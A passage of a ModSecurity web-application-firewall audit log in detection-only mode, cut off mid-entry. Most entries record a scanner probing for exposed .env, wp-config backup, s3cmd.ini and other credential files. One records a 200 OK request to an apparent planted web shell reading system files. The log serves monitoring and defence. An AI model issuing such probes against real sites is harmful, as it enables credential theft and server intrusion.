"DETECTION_ONLY" --6c37f272-Z-- --caad9d04-A-- [17/Jun/2025:00:34:45.634123 +0530] aFBqzU3CmevS3xeTzmojIwAAAAQ 185.177.72.201 36088 127.0.0.1 7080 --caad9d04-B-- GET /s3cmd.ini HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --caad9d04-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --caad9d04-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/s3cmd.ini"] [unique_id "aFBqzU3CmevS3xeTzmojIwAAAAQ"] Stopwatch: 1750100685630269 3939 (- - -) Stopwatch2: 1750100685630269 3939; combined=2270, p1=458, p2=1737, p3=0, p4=0, p5=75, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --caad9d04-Z-- --34372a6c-A-- [17/Jun/2025:00:34:45.744163 +0530] aFBqzVJfblPUQiSn5r1hlQAAAAA 185.177.72.201 36108 127.0.0.1 7080 --34372a6c-B-- GET /wp-config.php.txt HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --34372a6c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --34372a6c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.txt"] [unique_id "aFBqzVJfblPUQiSn5r1hlQAAAAA"] Stopwatch: 1750100685741416 2800 (- - -) Stopwatch2: 1750100685741416 2800; combined=1604, p1=349, p2=1203, p3=0, p4=0, p5=52, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34372a6c-Z-- --8219e604-A-- [17/Jun/2025:00:34:45.965813 +0530] aFBqzSid3pHxA3RhGpzqLgAAAAk 185.177.72.201 36140 127.0.0.1 7080 --8219e604-B-- GET /api/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8219e604-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8219e604-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/api/.env"] [unique_id "aFBqzSid3pHxA3RhGpzqLgAAAAk"] Stopwatch: 1750100685962683 3183 (- - -) Stopwatch2: 1750100685962683 3183; combined=1840, p1=376, p2=1410, p3=0, p4=0, p5=54, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8219e604-Z-- --08a66501-A-- [17/Jun/2025:00:34:46.186436 +0530] aFBqzh6Azi2u_ik2Q3KpFQAAAAY 185.177.72.201 36164 127.0.0.1 7080 --08a66501-B-- GET /.env.local HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --08a66501-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --08a66501-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.local"] [unique_id "aFBqzh6Azi2u_ik2Q3KpFQAAAAY"] Stopwatch: 1750100686183622 2888 (- - -) Stopwatch2: 1750100686183622 2888; combined=1598, p1=354, p2=1192, p3=0, p4=0, p5=52, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08a66501-Z-- --e78a4215-A-- [17/Jun/2025:00:34:46.517572 +0530] aFBqzn8PxMRZ7s11niQJ2AAAAAI 185.177.72.201 36202 127.0.0.1 7080 --e78a4215-B-- GET /wp-config.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e78a4215-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e78a4215-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.old"] [unique_id "aFBqzn8PxMRZ7s11niQJ2AAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.old"] [unique_id "aFBqzn8PxMRZ7s11niQJ2AAAAAI"] Stopwatch: 1750100686514417 3210 (- - -) Stopwatch2: 1750100686514417 3210; combined=1912, p1=394, p2=1435, p3=0, p4=0, p5=82, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e78a4215-Z-- --49ba0909-A-- [17/Jun/2025:00:34:46.628584 +0530] aFBqziid3pHxA3RhGpzqLwAAAAk 185.177.72.201 36214 127.0.0.1 7080 --49ba0909-B-- GET /wp-config.php_old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --49ba0909-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --49ba0909-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_old"] [unique_id "aFBqziid3pHxA3RhGpzqLwAAAAk"] Stopwatch: 1750100686625420 3217 (- - -) Stopwatch2: 1750100686625420 3217; combined=1836, p1=521, p2=1259, p3=0, p4=0, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49ba0909-Z-- --ac2fe73c-A-- [17/Jun/2025:00:34:47.181878 +0530] aFBqz38PxMRZ7s11niQJ2QAAAAI 185.177.72.201 36272 127.0.0.1 7080 --ac2fe73c-B-- GET /.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ac2fe73c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ac2fe73c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.bak"] [unique_id "aFBqz38PxMRZ7s11niQJ2QAAAAI"] Stopwatch: 1750100687178638 3304 (- - -) Stopwatch2: 1750100687178638 3304; combined=1962, p1=343, p2=1554, p3=0, p4=0, p5=65, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ac2fe73c-Z-- --e747f40a-A-- [17/Jun/2025:00:34:47.292340 +0530] aFBqz33hoSwVUy254pH0OAAAACQ 185.177.72.201 36280 127.0.0.1 7080 --e747f40a-B-- GET /web.config.txt HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e747f40a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e747f40a-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.txt"] [unique_id "aFBqz33hoSwVUy254pH0OAAAACQ"] Stopwatch: 1750100687289209 3185 (- - -) Stopwatch2: 1750100687289209 3185; combined=1865, p1=391, p2=1416, p3=0, p4=0, p5=58, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e747f40a-Z-- --a4a8f554-A-- [17/Jun/2025:00:34:47.625290 +0530] aFBqz5lL5_2Zd8wUdfLJCQAAAAg 185.177.72.201 36318 127.0.0.1 7080 --a4a8f554-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4a8f554-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a4a8f554-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/storage/logs/laravel.log"] [unique_id "aFBqz5lL5_2Zd8wUdfLJCQAAAAg"] Stopwatch: 1750100687621967 3376 (- - -) Stopwatch2: 1750100687621967 3376; combined=2050, p1=373, p2=1614, p3=0, p4=0, p5=63, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4a8f554-Z-- --fee83074-A-- [17/Jun/2025:00:34:47.844950 +0530] aFBqz38PxMRZ7s11niQJ2gAAAAI 185.177.72.201 36344 127.0.0.1 7080 --fee83074-B-- GET /.htaccess.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fee83074-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --fee83074-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.bak"] [unique_id "aFBqz38PxMRZ7s11niQJ2gAAAAI"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.bak Stopwatch: 1750100687843996 1026 (- - -) Stopwatch2: 1750100687843996 1026; combined=523, p1=439, p2=0, p3=0, p4=0, p5=84, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fee83074-Z-- --ced6c64f-A-- [17/Jun/2025:00:34:48.288672 +0530] aFBq0JlL5_2Zd8wUdfLJCgAAAAg 185.177.72.201 36418 127.0.0.1 7080 --ced6c64f-B-- GET /system/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ced6c64f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ced6c64f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/system/.env"] [unique_id "aFBq0JlL5_2Zd8wUdfLJCgAAAAg"] Stopwatch: 1750100688285265 3461 (- - -) Stopwatch2: 1750100688285265 3461; combined=1966, p1=427, p2=1484, p3=0, p4=0, p5=55, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ced6c64f-Z-- --1763cd29-A-- [17/Jun/2025:00:34:48.510129 +0530] aFBq0H3hoSwVUy254pH0OgAAACQ 185.177.72.201 36444 127.0.0.1 7080 --1763cd29-B-- GET /settings.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1763cd29-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1763cd29-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/settings.php.backup"] [unique_id "aFBq0H3hoSwVUy254pH0OgAAACQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/settings.php.backup' not found or unable to stat Stopwatch: 1750100688506712 3473 (- - -) Stopwatch2: 1750100688506712 3473; combined=2060, p1=354, p2=1648, p3=0, p4=0, p5=58, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1763cd29-Z-- --ab4ac237-A-- [17/Jun/2025:00:34:48.734028 +0530] aFBq0JlL5_2Zd8wUdfLJCwAAAAg 185.177.72.201 36464 127.0.0.1 7080 --ab4ac237-B-- GET /wp-config.php.3 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ab4ac237-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ab4ac237-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.3"] [unique_id "aFBq0JlL5_2Zd8wUdfLJCwAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.3' not found or unable to stat Stopwatch: 1750100688730686 3399 (- - -) Stopwatch2: 1750100688730686 3399; combined=1964, p1=427, p2=1467, p3=0, p4=0, p5=70, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab4ac237-Z-- --ec008f3f-A-- [17/Jun/2025:00:34:48.955448 +0530] aFBq0I3q6eGJ2xNcTd6G1AAAAAU 216.73.216.71 59914 127.0.0.1 7081 --ec008f3f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Finit.d%2Fdbus HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ec008f3f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4445 Connection: close Content-Type: text/html; charset=UTF-8 --ec008f3f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /snap/core20/2599/etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBq0I3q6eGJ2xNcTd6G1AAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /snap/core20/2599/etc/init.d/dbus"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBq0I3q6eGJ2xNcTd6G1AAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100688951448 4055 (- - -) Stopwatch2: 1750100688951448 4055; combined=1927, p1=278, p2=1509, p3=35, p4=22, p5=83, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec008f3f-Z-- --0f819a7c-A-- [17/Jun/2025:00:34:49.066849 +0530] aFBq0X3hoSwVUy254pH0PAAAACQ 185.177.72.201 36514 127.0.0.1 7080 --0f819a7c-B-- GET /staging2/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f819a7c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0f819a7c-H-- Message: Warning. Matched 